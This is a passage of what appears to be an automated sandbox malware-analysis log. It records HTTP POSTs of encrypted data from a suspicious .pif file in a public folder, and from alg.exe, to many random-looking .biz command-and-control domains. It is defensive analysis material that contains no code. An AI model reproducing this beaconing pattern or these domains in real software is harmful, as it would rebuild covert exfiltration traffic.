                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dc84dfb2ebb7d452d6e11bfbdcf1d970|173.254.250.82|1730445891|1730445891|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        127192.168.2.84995034.246.200.160804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.817914009 CET360OUTPOST /xsnbcmvbhjayqro HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.817944050 CET778OUTData Raw: b6 be 53 3a 81 eb 5e 9b fe 02 00 00 20 ab e9 5d e8 1d 42 90 c6 a6 39 6f 43 79 cb 71 ed 81 80 24 71 c5 d7 cd 30 dc a9 e1 6b 82 65 ec b4 84 f0 f8 cf 4f 95 43 68 51 cf 61 e7 e3 ef d8 6e 32 92 bd 5e d0 83 f9 7a 40 ac fb 86 42 7d 7f 17 1e 86 18 70 1d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: S:^ ]B9oCyq$q0keOChQan2^z@B}pqv67Y3[bw\t,r}x!?}9uw(#5)PNa:qs)nB;\C]_y_uhS~d+H(+&YfoLun#9~P?
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.798132896 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5d5390c066d984678f0dec645e5e8499|173.254.250.82|1730445891|1730445891|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        128192.168.2.849956208.100.26.245804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.830564022 CET356OUTPOST /myrpsocdgnp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.830589056 CET802OUTData Raw: 1d a1 7f d6 67 a2 17 7a 16 03 00 00 01 92 4b ee 52 81 00 e8 51 4e fd b0 ac 41 7f a0 ec 5c be ef 10 5e fc 27 f6 61 b5 43 59 01 f3 c4 dc 6c a1 aa 0a 6a 6c 15 c1 7f 8c ae e2 e0 95 72 ef cc 3e 82 81 7a 2d 9b f0 ad a1 e9 5c e9 4a 8e 0b 11 42 3c 29 bd
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: gzKRQNA\^'aCYljlr>z-\JB<)=J>3W-{c&%ondpA(^MB@1GyKTp&/'tZyd#lDRY}+DT_y/B)XHw8zMhXxj8c9A"oNuM#8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.476258039 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.822515965 CET347OUTPOST /pm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.822542906 CET802OUTData Raw: f1 72 76 c1 09 23 b0 69 16 03 00 00 34 74 59 b9 ed 1f 23 ed df 9e f3 8b fd c0 c0 f7 1f f0 6c fc 14 43 bf 46 b4 90 3c 2e e7 f2 dd 25 87 db 04 d1 05 6b b0 7e 06 11 3b 98 51 ef 2b d1 01 b6 4d e2 68 85 4d 7a d1 74 e5 7b be 3b dc 19 21 4e a7 ac ab 56
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: rv#i4tY#lCF<.%k~;Q+MhMzt{;!NV@Es>V|60M-c|Rp+qT\+:E'8Po$qW7Ab5&34Eueby>KSQ:5(vi\c.S=@ onb/wwK22XT_-H
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.969079018 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        129192.168.2.84996218.141.10.107804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.876780033 CET357OUTPOST /jntykoegrmymca HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.876791954 CET778OUTData Raw: 4f 33 02 92 9d 3b 51 ad fe 02 00 00 16 49 cf 08 9f 82 c3 02 97 da a8 8b 9f fb 7f 9f 27 52 ba bf f8 c7 c7 bb a5 9d 33 4e 96 e4 0c b1 48 bc df 88 03 b0 dd fd ad f6 79 cc 42 62 82 89 a9 69 1a 73 bd 16 62 8e 73 d2 62 5e f6 b4 4f e6 f4 19 ae 24 24 ca
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: O3;QI'R3NHyBbisbsb^O$$csD\w#$17[6(|${?" CX":vKUE_S~=~r9ny*ThQHPzkBIId4"lbb`y
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.305636883 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e03f9d79a37ba0face86ee4a2dfb9132|173.254.250.82|1730445894|1730445894|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        130192.168.2.84996544.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.993845940 CET355OUTPOST /nwuwfpndyaon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.993869066 CET802OUTData Raw: 15 54 c2 67 5e b5 29 d6 16 03 00 00 33 a5 76 1e f1 69 50 03 44 96 14 fb d3 e7 0f 59 65 d0 85 39 89 d4 2b 5c cb d3 18 26 81 ec e1 70 6c 93 99 92 ef 0b 68 e9 3b 03 9b ba c6 d1 a5 66 32 4b ba 29 d9 49 1f 88 91 23 20 07 e4 df ba b4 04 17 e5 a6 f5 43
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Tg^)3viPDYe9+\&plh;f2K)I# CdA-ReRbS3kFM=Sk3{8g8"_bQlH=(}FnJ#A*1~(5)PIr8D?sCQlP5HVmXiK\swcF(s
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.651650906 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=0382a81e8c4ffbecdb27a72995121f5d|173.254.250.82|1730445893|1730445893|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        131192.168.2.84996934.211.97.45804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.678520918 CET351OUTPOST /tpnlrogxe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.678536892 CET802OUTData Raw: 4c a3 5e d9 92 5b d2 ec 16 03 00 00 fa 86 30 7f 30 42 f7 62 95 0c 3a dc 00 21 76 58 17 df df a4 cc a8 bc 8e f4 2c b2 3c 4b 51 f3 08 35 e5 f4 b3 fd 4e 3a c8 de 04 6d 67 43 34 7c d6 d1 ab fc 0a 90 3c 4c 7e 8a 0d 9b 4f 4b 87 a1 23 36 d8 e0 8d 19 ea
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: L^[00Bb:!vX,<KQ5N:mgC4|<L~OK#6\m#@#4 k8sF5.+2D=8v$S*Hm#o/::W'0f66<8W_PP(t,]Gjy?=l.g4`q;
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.510951042 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1ce5ca8f8c2c0e7c08cb8617b68e70ad|173.254.250.82|1730445894|1730445894|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        132192.168.2.84997518.208.156.248804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.532212019 CET353OUTPOST /gqjcfeax HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.532252073 CET802OUTData Raw: 70 92 e0 4a bc 44 41 fe 16 03 00 00 ca dc df 5c 2e 53 cc 8c 68 5a 51 f3 fb b2 df 8f e3 33 06 2e 48 6d 4c b2 03 14 39 ac dd 18 a5 e4 51 a3 6f 6b 2d 84 df fd 36 f3 6f ed d8 15 77 93 1e 52 0e 41 40 8c 42 3d 4b d5 24 f5 29 92 b4 d6 49 d9 21 7f cd 1d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: pJDA\.ShZQ3.HmL9Qok-6owRA@B=K$)I!IgltR;v*t.7+w`l<]?NySMb"CHuzjkk&:rG|bV{Sp>#.P0x:%oRa8,'`jhM
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.197328091 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=06531049b15c17757c650d35665637e0|173.254.250.82|1730445895|1730445895|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        133192.168.2.84997613.251.16.150804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.560185909 CET355OUTPOST /fxyeanegauuypg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.560322046 CET778OUTData Raw: eb 25 f6 f6 d3 13 7c b3 fe 02 00 00 f3 96 f6 bf 5b b0 3c c7 e6 80 25 be 8b 22 e9 c4 3a b0 64 6e f3 70 61 48 9e f9 1a c9 c5 5a a1 f9 f3 6c f3 7e 4d d6 ac 98 78 18 ab 3e df 16 3a 0a 04 6f 3a df e1 e0 2c 1e 25 0e 63 76 e5 c1 52 df bb 88 c1 25 c9 ad
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: %|[<%":dnpaHZl~Mx>:o:,%cvR%);C~N$,iP^~Gtj&=qn\(66XI./|VC$dkLn(R+'}Z)<Q7AU~S;8H<M7/K3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.981276035 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=03e37d0e6e80d72762eddb505f975e14|173.254.250.82|1730445895|1730445895|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        134192.168.2.8499823.254.94.185804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.224277973 CET353OUTPOST /itmauuakdv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.224277973 CET802OUTData Raw: 09 79 b0 65 65 78 b6 8c 16 03 00 00 48 58 95 1e b3 c9 e2 32 bf 39 aa 83 14 31 9a 0b f9 83 f6 42 b8 8a 43 53 83 e2 ef e5 22 50 62 02 ec ba ee a7 6e f8 47 d0 cb e5 8a 42 dc bc 75 33 06 8b d1 73 f4 16 d5 f5 f0 7d 63 8b 7c e1 4c 9b cf 24 8a 5e 06 36
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: yeexHX291BCS"PbnGBu3s}c|L$^6?D]U%y.[GE^v}{wc)K@b4vTFAN@L8RpsK;q)=nHRgu %sl gK]"pRk6'J
